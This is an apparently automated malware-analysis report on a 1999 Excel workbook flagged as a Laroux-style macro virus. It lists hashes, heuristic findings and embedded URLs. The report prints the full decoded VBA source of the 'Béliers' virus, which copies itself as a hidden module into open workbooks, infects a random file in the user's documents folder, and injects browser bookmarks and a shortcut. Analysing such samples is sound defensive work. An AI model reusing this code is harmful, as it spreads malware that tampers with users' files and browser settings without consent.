Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c962b7e19c0f451…

MALICIOUS

Office (OLE)

Size: 71.5 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 76b45b0f1f1887ed6f49556ce528749d
SHA-1: 5290510e148d288beb5e6be11071d074cf7b6530
SHA-256: 6c962b7e19c0f451c1c46dde92f7f788df245e123383315a4b8d3a7839a0539e
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, including Auto_Open and Auto_Close, which run code automatically when the workbook is opened or closed and are indicative of macro-based malware. The heuristics specifically flag it as a potential Excel 5 Laroux macro-virus. The script attempts to copy itself to other workbooks and includes embedded URLs, suggesting a mechanism for spreading or downloading additional payloads.

Heuristics (5)

  • Excel 5 Laroux/Larou-CV macro-virus marker cluster [critical] (OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL: http://groupebelier/ (In document text, OLE body)
    • URL: http://www.groupebelier.ch (In document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3732 bytes
SHA-256: 25b727c5bcf298897e034cb85a8d166ef998bcfaba9be9669e804af1d00fda87
First 1,000 lines of the extracted script
Attribute VB_Name = "Béliers"

Rem ************************************************************************************************

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"

On Error Resume Next

If Right(Date, 2) = "99" Then action

fichiercourant = ActiveWorkbook.Name
    
For a = 1 To Workbooks.Count
 nbfeuilles = Workbooks(a).Sheets.Count
 ecrit = True
 For b = 1 To nbfeuilles
   If Workbooks(a).Sheets(b).Name = "Béliers" Then
    ecrit = False
   End If
 Next b
 If ecrit Then
  Workbooks(fichiercourant).Modules("Béliers").Copy after:=Workbooks(a).Sheets(nbfeuilles)
  Workbooks(a).Sheets("Béliers").Visible = False
  Workbooks(a).Sheets(1).Select
 End If
Next a
   
Workbooks(fichiercourant).Activate
ecrit_fichier

End Sub
  
Rem ************************************************************************************************

Sub Auto_close()
Attribute Auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
    
On Error Resume Next

fichiercourant = ActiveWorkbook.Name
    
For a = 1 To Workbooks.Count
 nbfeuilles = Workbooks(a).Sheets.Count
 ecrit = True
 For b = 1 To nbfeuilles
   If Workbooks(a).Sheets(b).Name = "Béliers" Then
    ecrit = False
   End If
 Next b
 If ecrit Then
  Workbooks(fichiercourant).Modules("Béliers").Copy after:=Workbooks(a).Sheets(nbfeuilles)
  Workbooks(a).Sheets("Béliers").Visible = False
  Workbooks(a).Sheets(1).Select
 End If

Next a
   
Workbooks(fichiercourant).Activate
ecrit_fichier
   
End Sub

Rem ************************************************************************************************
Sub ecrit_fichier()
Attribute ecrit_fichier.VB_ProcData.VB_Invoke_Func = " \n14"

On Error Resume Next

fichiercourant = ActiveWorkbook.Name
chemincourant = CurDir()

ChDrive "c"
ChDir ("c:\mes Documents")
fichier = Dir("*.xls")

n = 1

Do While fichier <> ""
  n = n + 1
  fichier = Dir()
Loop

b = Int(n * Rnd)
b = b - 1

ChDrive "c)"
ChDir ("c:\Mes Documents")
fichier = Dir("*.xls")

For a = 1 To b
 fichier = Dir()
Next a

If (fichier <> fichiercourant) And (fichier <> "") Then
 Workbooks.Open (fichier)
 feuillecourante = Workbooks(fichier).ActiveSheet.Name
 nbfeuilles = Workbooks(fichier).Sheets.Count
 ecrit = True
 
 For b = 1 To nbfeuilles
   If Workbooks(fichier).Sheets(b).Name = "Béliers" Then
    ecrit = False
   End If
 Next b
 
 If ecrit Then
  Workbooks(fichiercourant).Sheets("Béliers").Copy after:=Workbooks(fichier).Worksheets(nbfeuilles)
  Workbooks(fichier).Sheets("Béliers").Visible = False
  Workbooks(fichier).Sheets(feuillecourante).Select
 End If
 
 Workbooks(fichier).Save
 Workbooks(fichier).Close
End If

ChDrive (chemincourant)

End Sub

Rem ************************************************************************************************

Sub action()
Attribute action.VB_ProcData.VB_Invoke_Func = " \n14"

On Error Resume Next

Open "c:\Program files\netscape\navigator\program\bookmark.htm " For Append As #1
 Print #1, "    <DT><A HREF=""http://groupebelier/"" ADD_DATE=""890674206"" LAST_VISIT=""896388845"" LAST_MODIFIED=""890674114"">Groupe Bélier</A>"
Close #1

Open "c:\Program files\netscape\navigator\bookmark.htm " For Append As #1
 Print #1, "    <DT><A HREF=""http://groupebelier/"" ADD_DATE=""890674206"" LAST_VISIT=""896388845"" LAST_MODIFIED=""890674114"">Groupe Bélier</A>"
Close #1

Open "c:\windows\Favoris\Groupe Bélier.url" For Append As #1
 Print #1, "[InternetShortcut]"
 Print #1, "URL=http://www.groupebelier.ch"
Close #1

End Sub

Rem ************************************************************************************************